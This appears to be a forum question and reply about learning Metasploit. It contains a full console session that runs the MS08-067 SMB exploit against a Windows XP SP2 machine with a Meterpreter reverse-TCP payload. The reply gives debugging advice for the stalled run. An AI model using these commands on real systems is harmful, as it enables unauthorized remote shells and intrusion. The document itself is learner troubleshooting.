I'm learning the Metasploit framwork starting with Armitage to get a general understanding of the structure and such. I was trying to hack into an old Windowx XP sp2 I have when I try to run the exploits I get this
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 13592
LPORT => 13592
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.11
RHOST => 10.0.0.11
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.18.130:13592
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
I don't get any errors but it stalls there and doesn't carry out the exploit.
So it looks like the exploit doesn't work with the version of Windows you have. Maybe you can try another one, something simpler. When were these exploits created? Are you absolutely sure they are unpatched in your version of Windows?
If you want to learn anything from running exploit scripts written by others, you have to start debugging and try to understand what the script is doing. Find what exactly the script is doing after it says
Attempting to trigger the vulnerabilityand try to figure out why it might not be working. There are too many possibilities to speculate here.